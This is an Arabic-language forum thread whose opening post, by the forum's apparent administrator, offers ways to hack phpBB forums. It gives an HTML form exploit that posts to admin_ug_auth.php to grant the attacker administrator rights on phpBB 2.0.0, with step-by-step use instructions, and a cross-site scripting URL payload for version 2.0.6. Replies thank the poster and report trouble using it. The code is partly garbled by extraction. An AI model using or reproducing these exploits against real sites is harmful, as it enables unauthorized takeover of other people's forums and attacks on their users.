kingy
عدد المساهمات : 1 نقاط : 1 تاريخ التسجيل : 10/10/2011
| موضوع: رد: بعض طرق اختراق منتدى phpbb الإثنين أكتوبر 10, 2011 9:06 pm | |
| | |
|
hemo
عدد المساهمات : 2 نقاط : 2 تاريخ التسجيل : 22/09/2011
| موضوع: رد: بعض طرق اختراق منتدى phpbb الخميس سبتمبر 22, 2011 1:47 am | |
| الله يعطيك العافيه أخي بس والله جربتها ماظبطت يعني بعد ما حطيت صفه administrator ورقم العضويه ما فتحت الصفحه يلي بعد هيك ياريت تفيدنا في هل مشكله ويعطلك الف عافيه وياريت تقبلني عضوا في منتداك | |
|
ميدو السامرائي مدير
عدد المساهمات : 8 نقاط : 26 تاريخ التسجيل : 28/08/2010 العمر : 34
| موضوع: بعض طرق اختراق منتدى phpbb السبت أغسطس 28, 2010 8:22 pm | |
| !بســــــــــــم الله الرحمـــــــــــــــــــــــــــــــــن الرحيـــــــــــــــــــــــــــــــــــم !بعـــض طرق اختـــراق منتدى phpbbثغرة خطيرة من منتدى من نوع PhpBB2 في ملف admin_ug_auth.php الوصف: يمكنك من خلال هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى وبذلك يمكنك الدخول الى لوحة التحكم متى شئت الأصدار: 2.0.0 لتجربة الثغرة اولا سجل بالمنتدى ثم احفظ رقم عضويتك بالمنتدى بعدها افتح المفكرة وانسخ مايلي اليها كود PHP: <html> <head> head> ******>
<form method="post" action="http://www.domain_name/board_directory/adm in/admin_ug_auth.php"> User Level: <select name="userlevel"> <option value="admin">Administratoroption> <option value="user">Useroption>select> <input type="hidden" name="private[1]" value="0"> <input type="hidden" name="moderator[1]" value="0"> <input type="hidden" name="mode" value="user"> <input type="hidden" name="adv" value=""> User Number: <input type="text" name="u" size="5"> <input type="submit" name="submit" value="Submit">
form> body> html>
عدل هذا العنوان الى عنوان الموقع المستهدف [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]اخفظه بامتدادhtml عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى أضغط زر submit بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك
:::::::: ثغره فى الاصدار Powered by phpBB 2.0.6
كل ما عليك تطبق الكود كود PHP: http://www.xxxxx.com/php/index.php?category_rows[0][cat_id]=1&category_rows[0][cat_title]=waraxe********>document.write(document | |
|